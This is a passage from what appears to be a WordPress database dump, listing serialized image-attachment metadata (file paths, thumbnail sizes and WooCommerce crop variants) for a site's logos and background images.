300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"portfolio-img-16-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-16-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(59,3402,'_wp_attachment_image_alt','o'),(60,3403,'_wp_attached_file','2018/02/Logo-fotnote-800.png'),(61,3403,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:235;s:4:\"file\";s:28:\"2018/02/Logo-fotnote-800.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"Logo-fotnote-800-300x235.png\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"Logo-fotnote-800-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"Logo-fotnote-800-600x176.png\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Logo-fotnote-800-300x88.png\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Logo-fotnote-800-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"Logo-fotnote-800-768x226.png\";s:5:\"width\";i:768;s:6:\"height\";i:226;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"Logo-fotnote-800-630x235.png\";s:5:\"width\";i:630;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"Logo-fotnote-800-300x235.png\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"Logo-fotnote-800-550x235.png\";s:5:\"width\";i:550;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"Logo-fotnote-800-550x235.png\";s:5:\"width\";i:550;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"Logo-fotnote-800-300x235.png\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"Logo-fotnote-800-600x176.png\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"Logo-fotnote-800-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(62,2975,'_wp_attachment_image_alt','a'),(63,1434,'_wp_attachment_image_alt','q'),(64,2981,'_wp_attached_file','2018/02/contact-us-parallax-1.jpg'),(65,2981,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:564;s:4:\"file\";s:33:\"2018/02/contact-us-parallax-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"contact-us-parallax-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"contact-us-parallax-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"contact-us-parallax-1-600x176.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"contact-us-parallax-1-300x88.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"contact-us-parallax-1-1024x301.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"contact-us-parallax-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"contact-us-parallax-1-768x226.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:33:\"contact-us-parallax-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:33:\"contact-us-parallax-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:34:\"contact-us-parallax-1-1536x451.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:33:\"contact-us-parallax-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:34:\"contact-us-parallax-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:33:\"contact-us-parallax-1-550x564.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:564;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:34:\"contact-us-parallax-1-1100x564.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:564;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:33:\"contact-us-parallax-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"contact-us-parallax-1-600x176.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"contact-us-parallax-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(66,18,'_wp_attachment_image_alt','o'),(67,1435,'_wp_attached_file','2018/01/full-width-img-2.jpg'),(68,1435,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1305;s:6:\"height\";i:867;s:4:\"file\";s:28:\"2018/01/full-width-img-2.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"full-width-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"full-width-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"full-width-img-2-600x399.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"full-width-img-2-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"full-width-img-2-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"full-width-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"full-width-img-2-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"full-width-img-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"full-width-img-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"full-width-img-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"full-width-img-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"full-width-img-2-550x867.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:29:\"full-width-img-2-1100x867.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"full-width-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"full-width-img-2-600x399.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"full-width-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(69,52,'_wp_attached_file','2018/01/logo-1.png'),(70,52,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:470;s:6:\"height\";i:78;s:4:\"file\";s:18:\"2018/01/logo-1.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:17:\"logo-1-300x78.png\";s:5:\"width\";i:300;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:17:\"logo-1-100x78.png\";s:5:\"width\";i:100;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"logo-1-300x50.png\";s:5:\"width\";i:300;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"logo-1-150x78.png\";s:5:\"width\";i:150;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:17:\"logo-1-300x78.png\";s:5:\"width\";i:300;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:17:\"logo-1-300x78.png\";s:5:\"width\";i:300;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"logo-1-100x78.png\";s:5:\"width\";i:100;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(71,3403,'_wp_attachment_image_alt','o'),(72,52,'_wp_attachment_image_alt','o'),(73,1818,'_wp_attachment_image_alt','a'),(74,3405,'_wp_attached_file','2018/02/landing-background.jpg'),(75,3405,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:455;s:4:\"file\";s:30:\"2018/02/landing-background.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"landing-background-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-background-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"landing-background-600x142.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:142;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"landing-background-300x71.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:71;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"landing-background-1024x243.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:243;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-background-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"landing-background-768x182.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"landing-background-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"landing-background-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:31:\"landing-background-1536x364.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"landing-background-550x455.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:455;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:31:\"landing-background-1100x455.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:455;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"landing-background-550x455.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:455;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:31:\"landing-background-1100x455.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:455;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"landing-background-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"landing-background-600x142.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:142;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-background-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(76,73,'_wp_attached_file','2018/01/about-us-background.jpg'),(77,73,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:723;s:4:\"file\";s:31:\"2018/01/about-us-background.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"about-us-background-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"about-us-background-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"about-us-background-600x226.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"about-us-background-300x113.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:113;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"about-us-background-1024x386.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:386;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"about-us-background-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"about-us-background-768x289.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:289;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"about-us-background-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"about-us-background-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"about-us-background-1536x578.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"about-us-background-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"about-us-background-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"about-us-background-550x723.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:723;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:32:\"about-us-background-1100x723.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:723;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"about-us-background-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"about-us-background-600x226.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"about-us-background-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(78,1827,'_wp_attached_file','2018/02/what-we-do-img-1.jpg'),(79,1827,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:28:\"2018/02/what-we-do-img-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"what-we-do-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"what-we-do-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"what-we-do-img-1-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"what-we-do-img-1-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"what-we-do-img-1-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"what-we-do-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"what-we-do-img-1-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"what-we-do-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"what-we-do-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:29:\"what-we-do-img-1-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"what-we-do-img-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"what-we-do-img-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"what-we-do-img-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"what-we-do-img-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"what-we-do-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"what-we-do-img-1-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"what-we-do-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(80,2514,'_wp_attachment_image_alt','o'),(81,3944,'_wp_attachment_image_alt','a'),(82,2515,'_wp_attached_file','2018/02/pozadina-1-scaled.jpg'),(83,3951,'_wp_attached_file','2018/03/recipe-web2.jpg'),(84,3951,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:420;s:6:\"height\";i:630;s:4:\"file\";s:23:\"2018/03/recipe-web2.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"recipe-web2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"recipe-web2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\